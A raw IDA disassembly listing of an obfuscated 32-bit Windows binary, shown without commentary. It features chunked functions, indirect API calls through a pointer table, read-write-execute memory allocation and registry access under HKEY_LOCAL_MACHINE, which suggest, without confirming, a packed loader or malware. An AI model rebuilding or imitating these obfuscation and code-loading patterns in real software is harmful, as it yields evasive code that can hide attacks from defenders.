push dword ptr [ecx+0Ch]
pop edx
mov [edx+8], eax
push dword_9BCB74
pop eax
mov eax, [eax+0Ch]
push dword ptr [eax+8]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9BA5E8
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AB610: ; CODE XREF: sub_9B63D8-161A�j
mov ebx, 0Ch
loc_9AB615: ; CODE XREF: sub_9B63D8-1D39�j
mov [ebp-212Ch], ebx
push dword ptr [ebp-2124h]
pop ecx
add ecx, 0FFFFFFD9h
cmp ebx, ecx
jg loc_9B41A4
jmp loc_9AE818
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2E04
loc_9AB634: ; CODE XREF: sub_9B2E04-6BF�j
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop eax
push edi
call dword ptr [eax+38h]
jmp loc_9AC13B
; END OF FUNCTION CHUNK FOR sub_9B2E04
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B174C
loc_9AB650: ; CODE XREF: sub_9B174C+D79�j
push eax
pop ecx
dec ecx
mov dword_9BBD30, ecx
push 4
mov ecx, 4
mov edx, off_9B8DBE
call sub_9B1B20
loc_9AB66B: ; CODE XREF: sub_9B174C+D73�j
mov edx, dword_9BCB74
mov eax, [edx]
push off_9BA97F
call dword ptr [eax+1Ch]
jmp loc_9B166F
; END OF FUNCTION CHUNK FOR sub_9B174C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AB684: ; CODE XREF: sub_9B1D80+1ECC�j
push 0C01h
pop ecx
div ecx
add edx, 400h
jmp loc_9AC772
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AB698: ; CODE XREF: sub_9B1A08+3258�j
; DATA XREF: .text:off_9B8DA6�o
lea eax, [esi+esi*4]
push [ebp+eax*8+var_41BC]
pop eax
or eax, eax
jz loc_9AB8B5
jmp off_9BAFBB
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5100
loc_9AB6B4: ; CODE XREF: sub_9B5100+1D�j
push [esp+8+arg_0]
pop eax
mov edi, [esp+8+arg_4]
push eax
call sub_9AC6A0
add esp, 4
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_9B5100
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9AB6CC: ; CODE XREF: sub_9ACEE8-3E6�j
inc ebx
mov [ebp-0B4h], ebx
cmp ebx, 3
jle loc_9ACF55
jmp off_9BAB01
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9AB6E4: ; CODE XREF: sub_9B1F68+28F3�j
push eax
xor edx, edx
call sub_9AD590
test eax, eax
jz loc_9AFB74
jmp loc_9B64E4
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AB6FC: ; CODE XREF: sub_9B63D8-7183�j
mov dword ptr [ebp-2134h], 1
jmp loc_9AF94B
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEC20
loc_9AB70C: ; CODE XREF: sub_9AEC20-233B�j
mov dword_9BBD2C, edi
loc_9AB712: ; CODE XREF: sub_9AEC20-2341�j
push 4
mov ecx, 4
mov edx, off_9B8DBE
call sub_9B4480
test eax, eax
jnz loc_9AE5B7
jmp off_9B92F4
; END OF FUNCTION CHUNK FOR sub_9AEC20
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9AB734: ; CODE XREF: sub_9B3408-627E�j
; DATA XREF: .text:off_9BA164�o
mov eax, [esi+48h]
call sub_9AC448
mov [esi+48h], ebx
mov dword ptr [ebp-134h], 1
loc_9AB749: ; CODE XREF: sub_9B3408-8216�j
; sub_9B3408-7676�j ...
push dword ptr [ebp-124h]
pop eax
or eax, eax
jz loc_9B3761
jmp off_9B9713
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
align 10h
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACD20
loc_9AB768: ; CODE XREF: sub_9ACD20+1C�j
; DATA XREF: .text:off_9BAC75�o
pop ecx
retn
; END OF FUNCTION CHUNK FOR sub_9ACD20
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFC28
loc_9AB774: ; CODE XREF: sub_9AFC28+4A�j
; DATA XREF: .text:off_9BA3D0�o
lea eax, [esi+0FFFh]
and eax, 0FFFFF000h
mov [ebx+4], eax
push dword_9BCB74
pop ecx
mov edx, [ecx]
push 40h
push 3000h
push eax
push 0
call dword ptr [edx+10h]
push eax
pop edi
mov [ebx], edi
test edi, edi
jz loc_9ADF17
jmp off_9BAAA1
; END OF FUNCTION CHUNK FOR sub_9AFC28
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2830
loc_9AB7AC: ; CODE XREF: sub_9B2830+4D�j
cmp esi, 1FFCh
ja loc_9AD190
jmp loc_9B2680
; END OF FUNCTION CHUNK FOR sub_9B2830
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9AB7C0 proc near ; CODE XREF: sub_9B1A08-381B�p
; FUNCTION CHUNK AT 009AFD43 SIZE 00000025 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BAAD8
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov eax, 403Ch
mov large fs:0, esp
sub esp, 8
call __alloca_probe
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov edi, edx
mov esi, ecx
mov [ebp-18h], esp
mov [ebp-4050h], edi
mov dword ptr [ebp-4], 0
push dword ptr [edi+4]
pop ebx
push ebx
call sub_9B3EFC
add esp, 4
and eax, eax
jz loc_9AFD43
jmp sub_9B04A8
sub_9AB7C0 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF698
loc_9AB82C: ; CODE XREF: sub_9AF698+1B�j
jmp sub_9AD01C
; END OF FUNCTION CHUNK FOR sub_9AF698
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB3B0
loc_9AB834: ; CODE XREF: sub_9AB3B0+5F�j
mov edi, ebx
sub edx, eax
dec edi
loc_9AB839: ; CODE XREF: sub_9AB3B0+48F�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_9AB839
jmp loc_9B3C08
; END OF FUNCTION CHUNK FOR sub_9AB3B0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3150
loc_9AB848: ; CODE XREF: sub_9B3150+3C�j
mov esi, [ebx+44h]
cmp esi, eax
jz loc_9AEFA3
jmp loc_9AEB78
; END OF FUNCTION CHUNK FOR sub_9B3150
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B5480
loc_9AB858: ; CODE XREF: sub_9B5480-7B94�j
; DATA XREF: .text:off_9B8900�o
call sub_9AC448
loc_9AB85D: ; CODE XREF: sub_9B5480-7B9A�j
mov eax, [esi]
call sub_9AC448
mov dword ptr [esi], 0
jmp loc_9B335B
; END OF FUNCTION CHUNK FOR sub_9B5480
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ADCEC
loc_9AB870: ; CODE XREF: sub_9ADCEC-EA0�j
; DATA XREF: .text:off_9BA425�o
push 0FFFFh
pop eax
loc_9AB876: ; CODE XREF: sub_9ADCEC-EA6�j
mov [ebx+16h], ax
call sub_9AB574
mov [ebx+18h], ax
push 0CBDBDBABh
push 0CBDBEDEFh
push ebx
push 1Ah
pop eax
call sub_9B6370
jmp loc_9AE3D3
; END OF FUNCTION CHUNK FOR sub_9ADCEC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3984
loc_9AB89C: ; CODE XREF: sub_9B3984-7BBD�j
; sub_9B3984-7B5F�j ...
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop eax
push ebx
call dword ptr [eax+38h]
jmp loc_9AFB83
; END OF FUNCTION CHUNK FOR sub_9B3984
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AB8B0: ; CODE XREF: sub_9B1A08-635D�j
; DATA XREF: .text:off_9BAFBB�o
call sub_9AC448
loc_9AB8B5: ; CODE XREF: sub_9B1A08-6363�j
inc esi
mov [ebp+var_41E8], esi
jmp loc_9B4C58
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9AB8C4: ; CODE XREF: sub_9B4FD0-847E�j
; sub_9B4FD0-6243�j ...
inc ecx
jmp loc_9AF186
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9AB8CC: ; CODE XREF: sub_9AF25C-33E0�j
; DATA XREF: .text:off_9BAAC0�o
call sub_9AFF64
loc_9AB8D1: ; CODE XREF: sub_9AF25C-364B�j
; sub_9AF25C+4D�j ...
lea ecx, [ebp+8]
call sub_9B5480
jmp loc_9B33DB
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AB8E0: ; CODE XREF: sub_9ADAC4+413D�j
; DATA XREF: .text:off_9B93AB�o
mov ecx, dword_9BCB74
push dword ptr [ecx+10h]
pop edx
push ebx
call dword ptr [edx+38h]
loc_9AB8EE: ; CODE XREF: sub_9ADAC4+4137�j
; sub_9ADAC4+73F6�j
sub esi, esi
loc_9AB8F0: ; CODE XREF: sub_9ADAC4-1B0A�j
mov [ebp-40h], esi
cmp esi, 0Ah
jge loc_9AD4EB
jmp off_9B96EC
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B161C
loc_9AB904: ; CODE XREF: sub_9B161C-4CCB�j
pop esi
pop ebp
mov eax, 1
pop ebx
retn 8
; END OF FUNCTION CHUNK FOR sub_9B161C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AD11C
loc_9AB910: ; CODE XREF: sub_9AD11C+3A2B�j
mov ecx, [esp+18h+arg_C]
push ecx
push esi
mov eax, 30h
call sub_9AC32C
test al, 3
jnz loc_9AFA56
jmp off_9BAD27
; END OF FUNCTION CHUNK FOR sub_9AD11C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9AB930: ; CODE XREF: sub_9ACEE8+3027�j
; DATA XREF: .text:off_9BAEF5�o
inc ecx
mov [ebp-0DCh], ecx
loc_9AB937: ; CODE XREF: sub_9ACEE8-856�j
and ecx, ecx
jnz loc_9AF40A
jmp loc_9AF3F8
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B611C
loc_9AB944: ; CODE XREF: sub_9B611C+B�j
mov ax, word_9B93B4
mov [edi], ax
; END OF FUNCTION CHUNK FOR sub_9B611C
; START OF FUNCTION CHUNK FOR sub_9B6078
loc_9AB94D: ; CODE XREF: sub_9B6078-619�j
test dl, 2
jz loc_9B09C0
jmp loc_9AAFC8
; END OF FUNCTION CHUNK FOR sub_9B6078
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AB95C proc near ; CODE XREF: sub_9B3A74-8BE1�p
; sub_9B1B20-5EC9�p ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 009B05EE SIZE 00000003 BYTES
push ebp
push [esp+4+arg_0]
pop ebp
or ebp, ebp
push esi
push ecx
pop esi
jle loc_9B05EE
jmp sub_9B4724
sub_9AB95C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AB974: ; CODE XREF: sub_9B0930-14B6�j
; DATA XREF: .text:off_9B89E1�o
push off_9B9730
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
mov [edx+4Ch], eax
push dword_9BCB74
pop eax
push dword ptr [eax]
pop eax
push dword ptr [eax+4Ch]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp loc_9B480C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B037C
loc_9AB9A8: ; CODE XREF: sub_9B037C-4357�j
; sub_9B037C-3661�j ...
push dword ptr [ebp-4044h]
pop ecx
push ecx
xor edx, edx
call sub_9B5CDC
or eax, eax
jz loc_9B5E74
jmp off_9B9355
; END OF FUNCTION CHUNK FOR sub_9B037C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9AB9C8: ; CODE XREF: sub_9AF25C-3DD9�j
; sub_9AF25C+33C8�j ...
lea ecx, [ebp-28h]
call sub_9B5480
loc_9AB9D0: ; CODE XREF: sub_9AF25C+4921�j
; sub_9AF25C+4EDC�j
mov al, [ebp-20h]
test al, 1
push dword ptr [ebp-24h]
pop edi
jz loc_9B5344
jmp off_9BAAA9
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEDD0
loc_9AB9E8: ; CODE XREF: sub_9AEDD0+26�j
push dword_9BEC20[eax]
pop ecx
test ecx, ecx
jz loc_9B3228
jmp off_9B8DC2
; END OF FUNCTION CHUNK FOR sub_9AEDD0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B5300
loc_9ABA00: ; CODE XREF: sub_9B161C+F0�j
; sub_9B5300+D�j
; DATA XREF: ...
push 4
pop eax
loc_9ABA03: ; CODE XREF: sub_9B161C+C�j
pop esi
pop ebp
pop ebx
retn 8
; END OF FUNCTION CHUNK FOR sub_9B5300
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9ABA0C: ; CODE XREF: sub_9B63D8-280�j
cmp word ptr [edx+ebp-2120h], 0A0Dh
jz loc_9AC5C0
jmp loc_9ADE94
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B327C
loc_9ABA24: ; CODE XREF: sub_9B327C-588�j
; DATA XREF: .text:off_9BA3CC�o
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_9B327C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9ABA28: ; CODE XREF: sub_9B3864:loc_9ACC3C�j
mov eax, [ebp+var_2028]
test eax, eax
jnz loc_9AF480
jmp loc_9AF870
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9ABA3C proc near ; CODE XREF: sub_9B14CC+37�p
; FUNCTION CHUNK AT 009AB51F SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009AE300 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AEDFC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B028C SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009B06D4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B50EC SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B5CFC SIZE 00000026 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BAD4C
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 114h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
push ecx
pop esi
xor ebx, ebx
mov [ebp-18h], esp
mov [ebp-124h], ebx
mov [ebp-4], ebx
mov eax, dword_9BCB74
mov ecx, [eax]
push esi
push 104h
call dword ptr [ecx+38h]
cmp [esi], bl
jz loc_9B5D02
jmp loc_9AE300
sub_9ABA3C endp
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9ABAA4: ; CODE XREF: sub_9AC6DC-2F5�j
mov esi, dword_9BBD18
loc_9ABAAA: ; CODE XREF: sub_9AC6DC+69E4�j
; sub_9AC6DC+6F15�j
push eax
pop ecx
or ecx, ebx
jnz loc_9AFE48
jmp loc_9AFC78
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9ABABC: ; CODE XREF: sub_9AC32C+43EF�j
mov [esp+324h+var_204], ecx
mov [esp+324h+var_208], edx
loc_9ABACA: ; CODE XREF: sub_9AC32C+43E9�j
push eax
pop ebx
and ebx, 20h
jz loc_9AB496
jmp loc_9AB488
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9ABADC proc near ; CODE XREF: sub_9B3FF8-5BAC�p
; sub_9B2830+FE8�p
; FUNCTION CHUNK AT 009AAFAC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009AE8E0 SIZE 00000004 BYTES
test edx, edx
mov eax, edx
not eax
jz loc_9AE8E1
jmp loc_9AAFAC
sub_9ABADC endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9ABAF0: ; CODE XREF: sub_9AC6DC+74B8�j
; DATA XREF: .text:off_9B9E76�o
mov eax, esi
mov edx, 3E8h
mul edx
push ebx
push edi
push edx
push eax
call __aulldiv
mov ebx, edx
mov dword_9BBD10, eax
mov dword_9BBD14, ebx
jmp loc_9AC3DE
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9ABB14: ; CODE XREF: sub_9B4950+9F�j
lea ecx, [ebp-28h]
call sub_9B31A8
lea ecx, [ebp-2Ch]
call sub_9B31A8
lea ecx, [ebp-30h]
call sub_9B31A8
lea ecx, [ebp-34h]
call sub_9B31A8
lea ecx, [ebp-38h]
call sub_9B31A8
xor edi, edi
loc_9ABB3E: ; CODE XREF: sub_9B4950-4B0F�j
mov [ebp-1Ch], edi
cmp edi, 20h
jge loc_9B194C
jmp off_9B9268
; END OF FUNCTION CHUNK FOR sub_9B4950
; =============== S U B R O U T I N E =======================================
sub_9ABB50 proc near ; CODE XREF: sub_9B4FD0-4273�j
; sub_9B4FD0-1ECD�j
; FUNCTION CHUNK AT 009ACDE1 SIZE 00000034 BYTES
push ebx
pop ecx
call sub_9B35A0
or ebx, 0FFFFFFFFh
mov [ebp-228h], ebx
loc_9ABB60: ; CODE XREF: sub_9B4FD0-5E41�j
; sub_9B4FD0-4279�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_9ACDE1
sub_9ABB50 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9ABB6C: ; CODE XREF: sub_9ACEE8+3021�j
inc eax
jmp loc_9AC687
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2F1C
loc_9ABB74: ; CODE XREF: sub_9B2F1C-C04�j
lea edi, [eax+1Ah]
cmp edi, 1FFCh
jbe loc_9AE688
jmp loc_9AB548
; END OF FUNCTION CHUNK FOR sub_9B2F1C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9ABB88: ; CODE XREF: sub_9B0930-49A5�j
; DATA XREF: .text:off_9B980F�o
push off_9BA160
push dword ptr [eax]
pop eax
push eax
call esi
mov ecx, dword_9BCB74
mov edx, [ecx]
mov [edx+94h], eax
mov eax, dword_9BCB74
mov eax, [eax]
push dword ptr [eax+94h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp loc_9AB1F8
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9ABBC0: ; CODE XREF: sub_9AF25C+53�j
call sub_9B36E8
push eax
pop edi
sub edx, edx
mov [ebp-2Ch], edi
mov ecx, esi
call sub_9AEE5C
mov edx, 4
mov [ebp-1Ch], eax
call sub_9AEE5C
push eax
pop ebx
mov edx, 8
mov [ebp-30h], ebx
call sub_9AEE5C
mov edx, 0Ch
mov [ebp-24h], eax
call sub_9AEE5C
mov [ebp-20h], eax
push dword ptr [ebp-1Ch]
pop edx
and edx, 7FFFFFFFh
and edi, 7FFFFFFFh
cmp edx, edi
jbe loc_9AB8D1
jmp off_9BAB88
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ABC20 proc near ; CODE XREF: sub_9B1B20+7C�p
; sub_9B4480+77�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 009ADBF9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B1E69 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B5A9C SIZE 00000033 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B93A3
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 8
push ebx
jmp off_9B8FB3
sub_9ABC20 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1B20
loc_9ABC4C: ; CODE XREF: sub_9B1B20+99�j
; DATA XREF: .text:off_9BACE4�o
push edi
mov edx, ebx
lea eax, [ebp+var_328]
push esi
pop ecx
call sub_9AB95C
add esp, 4
push dword_9BCB74
pop edx
push dword ptr [edx+0Ch]
pop eax
lea ecx, [ebp+var_32C]
push ecx
push 20006h
push 0
lea edx, [ebp+var_224]
jmp off_9BA408
; END OF FUNCTION CHUNK FOR sub_9B1B20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4480
loc_9ABC84: ; CODE XREF: sub_9B4480-61F0�j
; DATA XREF: .text:off_9BA840�o
mov eax, dword_9BCB74
mov ecx, [eax+0Ch]
lea edx, [ebp+var_330]
push edx
push 20019h
push esi
lea eax, [ebp+var_224]
push eax
push 80000002h
call dword ptr [ecx+20h]
test eax, eax
jnz loc_9B4703
jmp off_9B9014
; END OF FUNCTION CHUNK FOR sub_9B4480
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9ABCB8: ; CODE XREF: sub_9B0930+3E2�j
push off_9B8EA4
mov ecx, [eax]
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx]
pop ecx
mov [ecx+58h], eax
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push dword ptr [eax+58h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp loc_9B426C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3FF8
loc_9ABCEC: ; CODE XREF: sub_9B3FF8-5978�j
lea ecx, [esi+8]
mov eax, [esi+4]
push eax
mov edx, [esi]
push edx
lea eax, [edi-8]
push ecx
call sub_9B6370
mov ecx, edi
push esi
pop edx
call sub_9B649C
push eax
pop ebx
mov [ebp+var_1C], ebx
cmp ebx, 0Eh
jb loc_9B2884
jmp loc_9B527C
; END OF FUNCTION CHUNK FOR sub_9B3FF8
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9ABD24: ; CODE XREF: sub_9AB1A0-3C3�j
; DATA XREF: .text:off_9BA5F0�o
sub ecx, eax
mov [ebp-20h], ecx
loc_9ABD29: ; CODE XREF: sub_9AB1A0+1B1C�j
; sub_9AB1A0+2FA2�j ...
inc ebx
jmp loc_9B4D6C
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9ABD30 proc near ; CODE XREF: sub_9B3984-542B�p
; sub_9B19D8+16�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
; FUNCTION CHUNK AT 009ACB34 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AD5B4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009ADF00 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AF2B4 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009AFFE4 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 009B07A4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B11CC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B4710 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B591C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B5D88 SIZE 00000015 BYTES
push ebp
mov ebp, [esp+4+arg_0]
push esi
push edi
push [esp+0Ch+arg_4]
pop edi
xor esi, esi
loc_9ABD3E: ; CODE XREF: sub_9ABD30+89E5�j
mov eax, [esp+0Ch+arg_C]
push eax
push ebx
mov eax, 8
call sub_9AC32C
test al, 3
jnz loc_9B11CC
jmp off_9B8D14
sub_9ABD30 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9ABD60: ; CODE XREF: sub_9B3408-433B�j
; DATA XREF: .text:off_9BAFE3�o
push dword ptr [ebp-128h]
pop ecx
mov [ebp-130h], ecx
push dword_9BCB74
pop edx
push dword ptr [edx+0Ch]
pop eax
lea ecx, [ebp-130h]
push ecx
mov edx, [esi+44h]
push edx
push ebx
push ebx
push edi
mov ecx, [ebp-124h]
push ecx
call dword ptr [eax+10h]
and eax, eax
jnz loc_9AB749
jmp off_9BA938
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3984
loc_9ABDA0: ; CODE XREF: sub_9B3984-5EC8�j
mov [ebp+var_2020], ax
push 5
push 2002h
lea ecx, [ebp+var_2020]
add eax, 2
mov edi, ebx
call sub_9B5300
mov [ebp+var_4050], eax
cmp eax, 4
jnz loc_9AB89C
jmp loc_9B102C
; END OF FUNCTION CHUNK FOR sub_9B3984
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9ABDD4: ; CODE XREF: sub_9B1F68-21DA�j
; DATA XREF: .text:off_9BAE6A�o
push dword ptr [ebx]
pop ecx
push ecx
jmp loc_9AFB61
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AEBB8
loc_9ABDE3: ; CODE XREF: sub_9AEBB8+317E�j
; sub_9B5228+28�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-124h]
pop eax
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
push dword ptr [ebp-1Ch]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9AEBB8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9ABE10: ; CODE XREF: sub_9B63D8-152C�j
jg loc_9AF94B
jmp loc_9AED08
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3984
loc_9ABE1C: ; CODE XREF: sub_9B3984-5417�j
push [ebp+var_4054]
pop eax
and eax, eax
jz loc_9AB89C
jmp loc_9ADA80
; END OF FUNCTION CHUNK FOR sub_9B3984
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9ABE30: ; CODE XREF: sub_9ADAC4+565C�j
; DATA XREF: .text:off_9B8DEF�o
mov esi, eax
mov [ebp-48h], esi
loc_9ABE35: ; CODE XREF: sub_9ADAC4-46A�j
cmp esi, 0FFFFFFFFh
jnz loc_9B3334
jmp off_9BA6DF
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9ABE44: ; CODE XREF: sub_9AF25C+1900�j
; DATA XREF: .text:off_9B9A1D�o
mov dword_9BBD30, ebx
mov edx, [ebp-1Ch]
mov dword_9BBD2C, edx
push 4
push 4
pop ecx
push off_9B8DBE
